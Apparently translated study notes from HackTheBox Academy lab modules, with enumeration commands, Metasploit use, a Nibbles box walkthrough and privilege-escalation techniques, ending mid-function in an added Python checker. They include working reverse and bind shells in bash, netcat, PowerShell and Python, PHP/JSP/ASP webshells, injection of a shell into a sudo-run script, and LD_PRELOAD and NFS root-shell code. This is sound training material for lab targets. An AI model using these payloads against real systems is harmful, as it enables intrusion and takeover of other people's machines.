
HackTheBox learning notes

HackTheBox is a good platform for learning security.

You can follow the skill paths provided at https://academy.hackthebox.eu/paths

QQ group: 397745473

Basic Toolset

Learning the toolset

In this path, the modules cover the essential tools needed to succeed in network and web application penetration testing. This is not an exhaustive list of every tool (open source and commercial) available to us as security practitioners, but it covers the tried-and-true tools we find ourselves using on every technical assessment we perform. Learning how to use the basic toolset is essential, because many different tools are used in penetration testing, and we need to know which of them to use in the various situations we will encounter.

Another useful resource for help when we have trouble understanding a long command is https://explainshell.com/

Command                   Description
man <tool>                Opens the man pages for the specified tool.
<tool> -h                 Prints the help page of the tool.
apropos <keyword>         Searches through man pages' descriptions for instances of a given keyword.
cat                       Concatenates and prints files.
whoami                    Displays the current username.
id                        Returns the user's identity.
hostname                  Sets or prints the name of the current host system.
uname                     Prints the operating system name.
pwd                       Returns the working directory name.
ifconfig                  Assigns or views the address of a network interface and/or configures network interface parameters.
ip                        Shows or manipulates routing, network devices, interfaces, and tunnels.
netstat                   Shows network status.
ss                        Another utility to investigate sockets.
ps                        Shows process status.
who                       Displays who is logged in.
env                       Prints the environment or sets and executes a command.
lsblk                     Lists block devices.
lsusb                     Lists USB devices.
lsof                      Lists open files.
lspci                     Lists PCI devices.
sudo                      Executes a command as a different user.
su                        Requests appropriate user credentials via PAM and switches to that user ID (the default user is the superuser). A shell is then executed.
useradd                   Creates a new user or updates default new-user information.
userdel                   Deletes a user account and related files.
usermod                   Modifies a user account.
addgroup                  Adds a group to the system.
delgroup                  Removes a group from the system.
passwd                    Changes a user's password.
dpkg                      Installs, removes and configures Debian-based packages.
apt                       High-level package management command-line utility.
aptitude                  Alternative to apt.
snap                      Installs, removes and configures snap packages.
gem                       Standard package manager for Ruby.
pip                       Standard package manager for Python.
git                       Revision control system command-line utility.
systemctl                 Command-line based service and systemd control manager.
ps                        Prints a snapshot of the current processes.
journalctl                Queries the systemd journal.
kill                      Sends a signal to a process.
bg                        Puts a process into the background.
jobs                      Lists all processes that are running in the background.
fg                        Puts a process into the foreground.
curl                      Command-line utility to transfer data from or to a server.
wget                      An alternative to curl that downloads files from an FTP or HTTP(S) server.
python3 -m http.server    Starts a Python3 web server on TCP port 8000.
ls                        Lists directory contents.
cd                        Changes the directory.
clear                     Clears the terminal.
touch                     Creates an empty file.
mkdir                     Creates a directory.
tree                      Lists the contents of a directory recursively.
mv                        Moves or renames files or directories.
cp                        Copies files or directories.
nano                      Terminal-based text editor.
which                     Returns the path to a file or link.
find                      Searches for files in a directory hierarchy.
updatedb                  Updates the locate database for existing contents on the system.
locate                    Uses the locate database to find contents on the system.
more                      Pager that is used to read STDOUT or files.
less                      An alternative to more with more features.
head                      Prints the first ten lines of STDOUT or a file.
tail                      Prints the last ten lines of STDOUT or a file.
sort                      Sorts the contents of STDOUT or a file.
grep                      Searches for specific results that contain given patterns.
cut                       Removes sections from each line of files.
tr                        Replaces certain characters.
column                    Command-line based utility that formats its input into multiple columns.
awk                       Pattern scanning and processing language.
sed                       A stream editor for filtering and transforming text.
wc                        Prints newline, word, and byte counts for a given input.
chmod                     Changes the permissions of a file or directory.
chown                     Changes the owner and group of a file or directory.

Key notes

Download the OpenVPN client to connect

https://openvpn.net/client-connect-vpn-for-windows/

The Bitvise SSH client can be used to connect

# Start a simple web server
python3 -m http.server        # python3
http-server -p 8080           # npm install http-server
php -S 127.0.0.1:8080         # php


# Look up a file's inode number: ls -i /var/backups/shadow.bak

# What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?
# (the -name pattern is quoted so the shell does not expand it against the current directory)
$ find / -type f -name '*.conf' -user root -size +25k -size -28k -newermt 2020-03-03 -exec ls -al {} \; 2>/dev/null

# How many files exist on the system that have the ".bak" extension?
$ find / -type f -name '*.bak' -exec ls -al {} \; 2>/dev/null | wc -l

# Submit the full path of the "xxd" binary.
$ find / -type f -name xxd -exec ls -al {} \; 2>/dev/null

# How many files exist on the system that have the ".log" file extension?
$ find / -type f -name '*.log' -exec ls -al {} \; 2>/dev/null | wc -l

# How many total packages are installed on the target system?
$ dpkg -l | grep -c '^ii'

# How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)
$ ss -l -4 | grep -v "127\.0\.0" | grep "LISTEN" | wc -l

# Determine what user the ProFTPd server is running under. Submit the username as the answer.
$ ps -ef | grep ftpd

# Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.
$ curl https://www.inlanefreight.com | tr " " "\n" | cut -d"'" -f2 | cut -d'"' -f2 | grep "www.inlanefreight.com" | sort -u | wc -l

# Online JS obfuscation tools
http://beautifytools.com/javascript-obfuscator.php
https://jsconsole.com
https://obfuscator.io
https://beautifier.io/

# Code formatters
https://prettier.io/playground/
http://www.jsnice.org/

# Base64 Encode Decode
$ echo https://www.hackthebox.eu/ | base64
$ echo aHR0cHM6Ly93d3cuaGFja3RoZWJveC5ldS8K | base64 -d

# Hex Encode Decode
$ echo https://www.hackthebox.eu/ | xxd -p
$ echo 68747470733a2f2f7777772e6861636b746865626f782e65752f0a | xxd -p -r

# Rot13 Encode Decode
$ echo https://www.hackthebox.eu/ | tr 'A-Za-z' 'N-ZA-Mn-za-m'
$ echo uggcf://jjj.unpxgurobk.rh/ | tr 'A-Za-z' 'N-ZA-Mn-za-m'

# Using what you learned in this section, determine the type of encoding used in the string you got at previous exercise, and decode it. To get the flag, you can send a 'POST' request to 'serial.php', and set the data as "serial=YOUR_DECODED_OUTPUT".
$ curl http://188.166.173.208:31747/serial.php -X POST -d "serial=7h15_15_a_s3cr37_m3554g3"
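As an added example (my own code, not from the HTB module), a small Python helper that guesses which of the three encodings shown above (hex, base64, rot13) a string uses and decodes it; it is exercised on the three encoded forms of https://www.hackthebox.eu/ from this section, and the function names are my own.

```python
import base64
import codecs
import re
from typing import Optional, Tuple

# Alphabets of the two encodings that can be recognised structurally.
HEX_RE = re.compile(r"[0-9a-fA-F]+")
B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def guess_encoding(s: str) -> str:
    """Return 'hex', 'base64' or 'rot13' for the given encoded string.

    Hex is checked first because a hex string also fits the base64 alphabet;
    anything outside both alphabets (e.g. containing ':' or '/') is assumed
    to be rot13, which leaves punctuation untouched.
    """
    s = s.strip()
    if HEX_RE.fullmatch(s) and len(s) % 2 == 0:
        return "hex"
    if B64_RE.fullmatch(s) and len(s) % 4 == 0:
        return "base64"
    return "rot13"


def decode(s: str, enc: Optional[str] = None) -> Tuple[str, str]:
    """Decode s with the given (or guessed) encoding; returns (encoding, text).

    Raises ValueError when the result is not printable text, the usual sign
    that the guess was wrong and the next candidate should be tried by hand.
    """
    s = s.strip()
    enc = enc or guess_encoding(s)
    if enc == "hex":
        raw = bytes.fromhex(s)
    elif enc == "base64":
        raw = base64.b64decode(s, validate=True)
    elif enc == "rot13":
        return enc, codecs.decode(s, "rot_13")
    else:
        raise ValueError(f"unknown encoding {enc!r}")
    text = raw.decode("utf-8")  # UnicodeDecodeError also means a bad guess
    if not all(c.isprintable() or c in "\r\n\t" for c in text):
        raise ValueError(f"{enc} decode of {s!r} is not printable text")
    return enc, text


if __name__ == "__main__":
    # The three encoded forms of https://www.hackthebox.eu/ shown above.
    for sample in ("aHR0cHM6Ly93d3cuaGFja3RoZWJveC5ldS8K",
                   "68747470733a2f2f7777772e6861636b746865626f782e65752f0a",
                   "uggcf://jjj.unpxgurobk.rh/"):
        enc, text = decode(sample)
        print(f"{enc:7s} -> {text.strip()}")
```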


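The listening-service count from the `ss -l -4` exercise above, reimplemented as an added Python example (my own code, not the page's or HTB's) that parses the output and filters on the parsed address instead of a substring match; the sample output lines and function names are constructed for this example.

```python
import ipaddress
from typing import List, Tuple

# Constructed sample of `ss -l -4` output (not captured from any HTB target),
# following the column layout printed by iproute2's ss.
SAMPLE_SS_OUTPUT = """\
Netid State  Recv-Q Send-Q  Local Address:Port   Peer Address:Port Process
udp   UNCONN 0      0       127.0.0.53%lo:domain 0.0.0.0:*
udp   UNCONN 0      0       0.0.0.0:bootpc       0.0.0.0:*
tcp   LISTEN 0      128     0.0.0.0:ssh          0.0.0.0:*
tcp   LISTEN 0      80      127.0.0.1:mysql      0.0.0.0:*
tcp   LISTEN 0      128     0.0.0.0:21           0.0.0.0:*
tcp   LISTEN 0      4096    10.0.2.15:8080       0.0.0.0:*
tcp   LISTEN 0      128     127.0.0.1:8000       0.0.0.0:*
"""


def parse_ss(output: str) -> List[Tuple[str, str, str, str]]:
    """Parse ss output into (netid, state, local_addr, local_port) tuples."""
    rows = []
    for line in output.splitlines()[1:]:  # skip the header line
        fields = line.split()
        if len(fields) < 5:
            continue
        netid, state, local = fields[0], fields[1], fields[4]
        addr, _, port = local.rpartition(":")  # the port never contains ':'
        addr = addr.split("%")[0]              # drop a %iface scope suffix
        rows.append((netid, state, addr, port))
    return rows


def exposed_listeners(output: str) -> List[Tuple[str, str, str]]:
    """Return (netid, addr, port) for sockets reachable from other hosts.

    Mirrors the exercise's filter: LISTEN state only (so TCP; UDP sockets
    show as UNCONN and are not counted) and not bound to a loopback address.
    """
    exposed = []
    for netid, state, addr, port in parse_ss(output):
        if state != "LISTEN":
            continue
        if addr != "*" and ipaddress.ip_address(addr).is_loopback:
            continue
        exposed.append((netid, addr, port))
    return exposed


if __name__ == "__main__":
    listeners = exposed_listeners(SAMPLE_SS_OUTPUT)
    for entry in listeners:
        print(entry)
    print(len(listeners), "listening services on non-loopback IPv4")
```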


Parrot Sec system

# Download https://parrotsec.org/download/
# VM edition https://www.parrotsec.org/virtual/
# Installation https://docs.parrotlinux.org/installation.html
# Configuration https://docs.parrotlinux.org/parrot-software-management.html
# Forum https://community.parrotsec.org/c/support/6
# Docker edition
docker run --rm -ti --network host -v $PWD/work:/work parrotsec/security
# See the usage guide https://parrotsec.org/docs/parrot-on-docker.html

nmap scanning

$ nmap -sV -sC -p- 10.129.42.253
$ nmap --script smb-os-discovery.nse -p445 10.10.10.40
$ nmap -A -p445 10.129.42.253
$ smbclient -N -L \\\\10.129.42.253
$ smbclient \\\\10.129.42.253\\users
$ smbclient -U bob \\\\10.129.42.253\\users

# Perform an Nmap scan of the target. What service is running on port 8080? (two words)
$ nmap -A -p8080 10.129.42.254
# Perform an Nmap scan of the target and identify the non-default port that the telnet service is running on.
$ nmap -A 10.129.42.254
# List the SMB shares available on the target host. Connect to the available share as the bob user. Once connected, access the folder called 'flag' and submit the contents of the flag.txt file.
$ smbclient -N -L \\\\10.129.42.254
$ smbclient -U bob \\\\10.129.42.254\\users
bob:Welcome1

web

# Directory/file enumeration
# https://github.com/ffuf/ffuf
# https://github.com/OJ/gobuster
$ gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt

# DNS subdomain enumeration
# Wordlists: https://github.com/danielmiessler/SecLists (installing SecLists is not covered here)
# Next, add a DNS server (e.g. 1.1.1.1) to /etc/resolv.conf. We will target the domain inlanefreight.com, the website of a fictional freight and logistics company.
$ gobuster dns -d inlanefreight.com -w /usr/share/SecLists/Discovery/DNS/namelist.txt

# Web enumeration tips; tools: curl -IL and EyeWitness
# Another handy tool is EyeWitness, which can take screenshots of target web applications, fingerprint them and identify possible default credentials.
# https://github.com/FortyNorthSecurity/EyeWitness
$ curl -IL https://www.inlanefreight.com # grab the banner and headers

# whatweb
# The command-line tool whatweb extracts the versions of the web server, supporting frameworks and applications. This information helps us pinpoint the technologies in use and start searching for potential vulnerabilities.
$ whatweb 10.10.10.121
$ whatweb --no-errors 10.10.10.0/24
# Also check certificates and robots.txt

# Try running some of the web enumeration techniques you learned in this section on the server above, and use the info you get to get the flag.
$ gobuster dir -u http://142.93.35.92:31581/ -w /usr/share/dirb/wordlists/common.txt
http://142.93.35.92:31581/
http://142.93.35.92:31581/robots.txt
http://142.93.35.92:31581/admin-login-page.php
[CTRL + U] (view page source) reveals the username and password; log in with them to get the flag

Public Exploits

$ sudo apt install exploitdb -y
$ searchsploit openssh 7.2
$ msfconsole
msf6 > search exploit eternalblue
msf6 > use exploit/windows/smb/ms17_010_psexec
msf6 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 10.10.10.40
msf6 exploit(windows/smb/ms17_010_psexec) > set LHOST tun0
msf6 exploit(windows/smb/ms17_010_psexec) > check
msf6 exploit(windows/smb/ms17_010_psexec) > exploit
meterpreter > getuid
meterpreter > shell
C:\WINDOWS\system32>whoami

# Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)
$ msfconsole
msf6 > search simple backup
msf6 > use 0
msf6 auxiliary(scanner/http/wp_simple_backup_file_read) > show options
msf6 auxiliary(scanner/http/wp_simple_backup_file_read) > set RHOSTS 142.93.35.92
msf6 auxiliary(scanner/http/wp_simple_backup_file_read) > set RPORT 30715
msf6 auxiliary(scanner/http/wp_simple_backup_file_read) > run
msf6 auxiliary(scanner/http/wp_simple_backup_file_read) > set FILEPATH /flag.txt
msf6 auxiliary(scanner/http/wp_simple_backup_file_read) > run
After it runs, a local file path is printed: the remote file has been downloaded to that location.

Shells

# Reverse shell
# First listen on a port
$ nc -lvnp 1234
$ ip a # check our IP

# Then run a command on the remote machine to send a shell back to the machine that is listening on that port
# Reverse Shell Command
# Code: bash (the special path is lowercase /dev/tcp; bash does not recognise /dev/TCP)
bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f


# Code: powershell ($client must be assigned, otherwise $client.GetStream() fails)
powershell -NoP -NonI -W Hidden -Exec Bypass -Command $client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

# -----------------------------------------
# Bind shell (forward connection)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f

# Code: python
python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",1234));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")'

# Code: powershell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + " ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();

# Connect with
$ nc 10.10.10.1 1234

# Upgrading the TTY
# A shell obtained through nc is awkward to use; upgrading the tty as follows makes it much smoother
$ python -c 'import pty; pty.spawn("/bin/bash")'
After running this command, press ctrl+z to background the shell and return to our local terminal, then enter the following stty commands:
$ ^Z
$ stty raw -echo
$ fg

$ echo $TERM
$ stty size
$ export TERM=xterm-256color
$ stty rows 67 columns 318

# webshell
# Code: php
<?PHP system($_GET['cmd']);?>
# Code: jsp
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
# Code: asp
<% eval request("cmd") %>

Web server   Default webroot
Apache       /var/www/html/
Nginx        /usr/local/nginx/html/
IIS          c:\inetpub\wwwroot\
XAMPP        C:\xampp\htdocs\

Writing the shell: echo "<?PHP system(\$_GET['cmd']);?>" > /var/www/html/shell.php

# Access it at http://SERVER_IP:PORT/shell.php?cmd=id

Another option is to use cURL:
$ curl http://SERVER_IP:PORT/shell.php?cmd=id

Privilege Escalation

# References
https://book.hacktricks.xyz/
Linux privesc: https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist
Windows privesc: https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation

https://github.com/swisskyrepo/PayloadsAllTheThings
linux: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md
windows: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md

# Enumeration scripts
linux:
https://github.com/rebootuser/LinEnum
https://github.com/sleventyeleven/linuxprivchecker

windows:
https://github.com/GhostPack/Seatbelt
https://github.com/411Hall/JAWS

Another useful tool for server enumeration is the Privilege Escalation Awesome Scripts SUITE (PEASS), as it is well maintained and kept up to date, and includes scripts for enumerating both Linux and Windows.
https://github.com/carlospolop/PEASS-ng

# Test the automated Linux privesc script
$ ./linpeas.sh

# Kernel Exploits
# Vulnerable Software: use dpkg -l to list the installed software
# User Privileges
Sudo
SUID
Windows Token Privileges
$ sudo -l
$ sudo su -

# Scheduled Tasks
/etc/crontab
/etc/cron.d
/var/spool/cron/crontabs/root

# Exposed Credentials: in configuration files, log files and user history files (bash_history on Linux, PSReadLine on Windows)

# SSH Keys
.ssh directory
/home/user/.ssh/id_rsa or /root/.ssh/id_rsa
For example, once we obtain an id_rsa file we can run the following on our own machine:
$ vim id_rsa
$ chmod 600 id_rsa
$ ssh user@10.10.10.10 -i id_rsa
# If we have write access to this file, we can place our own public key in the user's ssh directory at /home/user/.ssh/authorized_keys.
$ ssh-keygen -f key
After generating the key pair, append the contents of the .pub file on the remote machine: $ echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys
Then we can log in directly with:
$ ssh root@10.10.10.10 -i key

# https://academy.hackthebox.eu/module/details/51
# https://academy.hackthebox.eu/module/details/67

# SSH into the server above with the provided credentials, and use the '-p xxxxxx' to specify the port shown above. Once you login, try to find a way to move to 'user2', to get the flag in '/home/user2/flag.txt'.
$ sudo -l
This shows: User user1 may run the following commands on gettingstartedprivesc-261588-68d7c7c946-5m4k5:
(user2 : user2) NOPASSWD: /bin/bash
$ sudo -u user2 /bin/bash
$ cat ~/flag.txt

# Once you gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt'.
user2 has permission to read the id_rsa under the root directory
$ cat /etc/ssh/ssh_config shows that the local SSH port is 80, so we can connect directly:
$ ssh root@127.0.0.1 -p 80 -i /root/.ssh/id_rsa

Transferring Files

# Set up a file server
$ python3 -m http.server 8000

# Download
$ wget http://10.10.14.1:8000/linenum.sh
$ curl http://10.10.14.1:8000/linenum.sh -o linenum.sh

# Using SCP
$ scp linenum.sh user@remotehost:/tmp/linenum.sh

# Using Base64: for example, to transfer a binary named shell, we can base64-encode it as follows:
$ base64 shell -w 0
$ echo f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAA...SNIO...lIuy9iaW4vc2gAU0iJ51JXSInmDwU | base64 -d > shell

# Validating File Transfers: to verify the file's format, run the file command on it:
$ file shell
# We can also check its md5 hash; on our own machine, run md5sum on it and compare:
$ md5sum shell

Starting Out

# Target machines
# OWASP Juice Shop is a modern vulnerable web application written in Node.js, Express and Angular that showcases the entire OWASP Top Ten along with many other real-world application security flaws.
https://owasp.org/www-project-juice-shop/

# Metasploitable 2 is an intentionally vulnerable Ubuntu Linux VM that can be used to practice enumeration, automated and manual exploitation.
https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/

# Metasploitable 3 is a template for building a vulnerable Windows VM configured with a wide range of vulnerabilities.
https://github.com/rapid7/metasploitable3

# DVWA is a vulnerable PHP/MySQL web application showcasing many common web application vulnerabilities at varying levels of difficulty.
https://github.com/digininja/DVWA

# YouTube Channels: many YouTube channels showcase penetration testing/hacking techniques. Some worth bookmarking:
# IppSec provides extremely in-depth walkthroughs of every retired HTB box, full of his own experience, as well as videos on various techniques.
https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA
# VbScrub provides HTB videos as well as technique videos, mainly focused on Active Directory exploitation.
https://www.youtube.com/channel/UCpoyhjwNIWZmsiKNKpsMAQQ
# STÖK provides videos on various infosec-related topics, mainly focused on bug bounties and web application penetration testing.
https://www.youtube.com/channel/UCQN2DsjnYH60SFBIA6IkNwg
# LiveOverflow provides videos on a wide range of technical infosec topics
https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w

# Blogs
# A great blog worth a look is 0xdf hacks stuff.
https://0xdf.gitlab.io/

# Tutorial Websites
# Many tutorial websites can be used to practice basic IT skills such as scripting.
# These sites aim to train users in Windows PowerShell and the Linux command line respectively, through various scenarios in a "wargame" format.
https://www.underthewire.tech/index.htm
https://overthewire.org/wargames/


# HTB Starting Point
https://www.hackthebox.eu/home/start
# HTB Tracks
https://www.hackthebox.eu/home/tracks

# Beginner-friendly HTB machines
https://www.hackthebox.eu/home/machines/profile/1
https://www.hackthebox.eu/home/machines/profile/51
https://www.hackthebox.eu/home/machines/profile/121
https://www.hackthebox.eu/home/machines/profile/108
https://www.hackthebox.eu/home/machines/profile/144

# Videos
# https://www.youtube.com/watch?list=PLidcsTyj9JXJfpkDrttTdk1MNT6CDwVZF&v=mC7G3i2gV54
# https://www.youtube.com/watch?list=PLidcsTyj9JXL4Jv6u9qi8TcUgsNoKKHNn&v=-KBm3tBNK74

# The HTB platform contains one-off challenges in various categories. Some beginner-friendly challenges include:
https://www.hackthebox.eu/home/challenges/Reversing?name=Find%20The%20Easy%20Pass
https://www.hackthebox.eu/home/challenges/Crypto?name=Weak%20RSA
https://www.hackthebox.eu/home/challenges/Pwn?name=You%20know%200xDiablos

# The Dante Pro Lab is by far the most beginner-friendly lab offered.
https://www.hackthebox.eu/home/labs/pro/view/4

Navigating HTB

# You can access your HTB profile page from the left pane or by clicking your username in the top pane.
https://app.hackthebox.eu/profile/overview
https://app.hackthebox.eu/tracks

Nibbles - Enumeration

Video: https://www.youtube.com/watch?v=s_0GcRGv6Ds
Walkthrough: https://0xdf.gitlab.io/2018/06/30/htb-nibbles.html

# Nmap: find open ports
$ nmap -sV --open -oA nibbles_initial_scan <ip address>
This runs a service enumeration (-sV) scan against the default top 1,000 ports and returns only open ports (--open).
We can check which ports nmap scans for a given scan type by running nmap -v -oG - with no target specified.
$ nmap -sV --open -oA nibbles_initial_scan 10.129.42.190
$ nmap -sC -p 22,80 -oA nibbles_script_scan 10.129.42.190

# Run an nmap script scan on the target. What is the Apache version running on the server? (answer format: X.X.XX)
$ nmap -sC -p 80 -oA nibbles_script_scan 10.129.42.190
2.4.18

# We can use whatweb to try to identify the web application in use.
$ whatweb http://10.129.42.190/nibbleblog
# Nibbleblog, a free blog engine built with PHP.
https://www.nibbleblog.com/

# Directory enumeration
# https://www.rapid7.com/db/modules/exploit/multi/http/nibbleblog_file_upload/
$ gobuster dir -u http://10.129.42.190/nibbleblog/ --wordlist /usr/share/dirb/wordlists/common.txt
$ curl -s http://10.129.42.190/nibbleblog/content/private/users.xml | xmllint --format -
# Tools such as Hydra can be used to brute-force the login
$ gobuster dir -u http://10.129.42.190/ --wordlist /usr/share/dirb/wordlists/common.txt
$ curl -s http://10.129.42.190/nibbleblog/content/private/config.xml | xmllint --format -
When cracking passwords offline with a tool like Hashcat, or when guessing passwords, it is not uncommon to succeed in cracking a password hash (for example a company's wireless network password) using a wordlist generated by scraping the site with a tool such as CeWL.
https://github.com/digininja/CeWL


# Reverse shell cheat sheets
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
https://highon.coffee/blog/reverse-shell-cheat-sheet/

# Upgrading the tty
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
$ python -c 'import pty; pty.spawn("/bin/bash")'

# Nibbles - Privilege Escalation
# Automated privesc
# Serve the file: sudo python3 -m http.server 8080
https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh



# Escalate privileges and submit the root.txt flag.
gobuster dir -u http://10.129.211.6/ -w /usr/share/dirb/wordlists/common.txt
curl -s http://10.129.211.6/nibbleblog/content/private/users.xml | xmllint --format -
curl -s http://10.129.211.6/nibbleblog/content/private/config.xml | xmllint --format -
http://10.129.211.6/nibbleblog/admin.php
admin / nibbles
http://10.129.211.6/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image
http://10.129.211.6/nibbleblog/content/private/plugins/my_image/

<?php system('id'); ?>
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.203 8888 >/tmp/f"); ?>
nc -lvnp 8888
curl http://10.129.211.6/nibbleblog/content/private/plugins/my_image/image.php
python3 -c 'import pty; pty.spawn("/bin/bash")'
sudo python3 -m http.server 8000
wget http://10.10.14.203:8000/LinEnum.sh
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.203 8889 >/tmp/f' | tee -a monitor.sh
nc -lvnp 8889
sudo /home/nibbler/personal/stuff/monitor.sh


# Spawn the target, gain a foothold and submit the contents of the user.txt flag.
nmap -sV --open -oA nibbles_initial_scan 10.129.133.76

Knowledge Check

This module gives an IP address to attack using the methods learned above.
Some hints were provided:
1. Scan the ports with Nmap
2. Use whatweb and Gobuster for CMS detection and path scanning
3. If the site's domain name is known, edit /etc/hosts so the site renders fully
4. Use Searchsploit to find public exploits
5. After getting a reverse shell, use Python3 pty to improve the terminal experience
6. Perform manual and automated enumeration of the filesystem to look for misconfigurations, services with known vulnerabilities, and sensitive data (such as credentials) in cleartext
7. There are two ways to get a shell: one with Metasploit and one manually
8. Privilege escalation can use either of the two tools below
https://github.com/rebootuser/LinEnum
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS

# Target obtained
10.129.225.231
# Install the required tools
$ sudo apt install exploitdb -y
$ searchsploit openssh 7.2

# First scan with nmap to see which ports are open
nmap -sV --open -oA nibbles_initial_scan 10.129.225.231

sudo apt-get install libxml2-utils # installs xmllint, an XML parsing tool
# https://gtfobins.github.io/ lists many privilege escalation techniques: ways that legitimate binaries can be abused to escalate privileges and obtain a shell


Linux Privilege Escalation

# Find world-writable directories
$ find / -path /proc -prune -o -type d -perm -o+w 2>/dev/null
# Find world-writable files
$ find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null

# https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh

# Kernel Exploits
# https://github.com/dirtycow/dirtycow.github.io

# Bash one-liner reverse shell
# http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
# On the target
$ bash -i >& /dev/tcp/10.10.15.169/443 0>&1
# Listener
$ nc -lnvp 443

# Special-permission privesc https://linuxconfig.org/how-to-use-special-permissions-the-setuid-setgid-and-sticky-bits
# suid: find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
# sgid: find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null
# (note: -perm -6000 only matches files with both SUID and SGID set; use -perm -2000 to list every SGID file)


# Sudo Rights Abuse
$ cat /tmp/.test (create this file with the following content)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.169 443 >/tmp/f
# Run: $ sudo /usr/sbin/tcpdump -ln -i ens192 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
# Start the listener: $ nc -lnvp 443

# PATH abuse
echo $PATH
# Wildcard abuse
# Credential hunting
$ grep 'DB_USER\|DB_PASSWORD' wp-config.php
$ find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null
$ ls ~/.ssh
# Shared library (LD_PRELOAD) privilege escalation
$ cat << EOF > root.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
EOF
# Compiler warnings can be ignored
$ gcc -fPIC -shared -o root.so root.c -nostartfiles
Run to escalate: $ sudo LD_PRELOAD=/tmp/root.so /usr/bin/openssl

# Shared object hijacking
ldd shows the location of each object and the hex address at which it is loaded into memory for every dependency of a program

# Privileged Groups
# Miscellaneous
showmount -e
cat /etc/exports

cat << EOF > shell.c

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main(void)
{
    setuid(0); setgid(0); system("/bin/bash");
}
EOF
showmount -e 10.129.170.31
gcc shell.c -o shell
sudo mount -t nfs 10.129.170.31:/tmp /mnt
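For the defender's side of the SUID/SGID find commands above, an added Python example (my own code, not from the HTB module or this page) that walks the filesystem for setuid/setgid files and diffs the result against a saved baseline, so a newly planted privileged binary stands out; SKIP_PREFIXES and the function names are my own assumptions.

```python
import os
import stat
from typing import Dict, Iterable, Set

# Pseudo filesystems that are noise for this check (assumed list).
SKIP_PREFIXES = ("/proc", "/sys", "/dev", "/run")


def special_bits(mode: int) -> str:
    """Return 'suid', 'sgid', 'suid+sgid' or '' for a stat st_mode value."""
    bits = []
    if mode & stat.S_ISUID:
        bits.append("suid")
    if mode & stat.S_ISGID:
        bits.append("sgid")
    return "+".join(bits)


def find_special(root: str = "/") -> Dict[str, str]:
    """Map every regular file under root with setuid/setgid to its bits.

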